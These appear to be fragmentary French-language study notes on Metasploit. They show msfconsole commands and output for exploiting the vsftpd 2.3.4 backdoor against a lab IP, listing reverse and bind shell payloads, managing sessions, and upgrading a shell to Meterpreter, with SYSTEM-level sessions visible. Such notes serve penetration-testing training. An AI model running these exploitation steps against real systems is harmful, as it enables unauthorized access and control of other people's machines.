Utilisation de Metasploit https://www.metasploit.com/ Metasploit Framework Metasploit Pro Matasploit Framework Console $ msfconsole ls ping -c 1 127.0.0.1 history back: quitter le contexte Search msf6> search vsftpd 2.3.4 Matching Modules ================
- ---- --------------- ---- ----- ----------- 0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor Rank:
- Excellent : Never crash
- Great : Auto detect version and options
- Good : Defaut for common cases
- Normal : depend on specific version
- Average : difficult to exploit
- Low : < 50% de success
- Manual : instable
module
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
Options
show options
set
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 16.2.0.3
setg
Payload
show payloads Compatible Payloads ===================
- ---- --------------- ---- ----- ----------- 0 generic/custom manual No Custom Payload 1 generic/shell_bind_tcp manual No Generic Command Shell, Bind TCP Inline 2 generic/shell_reverse_tcp manual No Generic Command Shell, Reverse TCP Inline 3 windows/x64/exec manual No Windows x64 Execute Command 4 windows/x64/loadlibrary manual No Windows x64 LoadLibrary Path 5 windows/x64/messagebox manual No Windows MessageBox x64 6 windows/x64/meterpreter/bind_ipv6_tcp manual No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager Exploitation check exploit sessions background ou Ctrl-Z msf6 > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.10.44.70:4444 -> 10.10.12.229:49163 (10.10.12.229) 2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.10.44.70:4444 -> 10.10.12.229:49186 (10.10.12.229) msf6 > sessions -i 2 [*] Starting interaction with 2... Usage $ msfconsole msf6> search vsftpd 2.3.4 Matching Modules ================
- ---- --------------- ---- ----- ----------- 0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor msf6 > use exploit/unix/ftp/vsftpd_234_backdoor msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 16.2.0.3 RHOSTS => 16.2.0.3 msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit [] 16.2.0.3:21 - Banner: 220 (vsFTPd 2.3.4) [] 16.2.0.3:21 - USER: 331 Please specify the password. [+] 16.2.0.3:21 - Backdoor service has been spawned, handling... [+] 16.2.0.3:21 - UID: uid=2000(ftp) gid=0(root) groups=0(root) [] Found shell. [] Command shell session 1 opened (16.2.0.2:39279 -> 16.2.0.3:6200) at 2023-11-28 15:00:37 +0000 id uid=2000(ftp) gid=0(root) groups=0(root) exit [*] 16.2.0.3 - Command shell session 1 closed. Upgrade shell to Meterpreter 1 Ctrl-Z sessions -u 1 Upgrade shell to Meterpreter 2 Ctrl-Z search shell_to_meterpreter use post/multi/manage/shell_to_meterpreter show options sessions -l set SESSION 1 run sessions -l session -i 2 sysinfo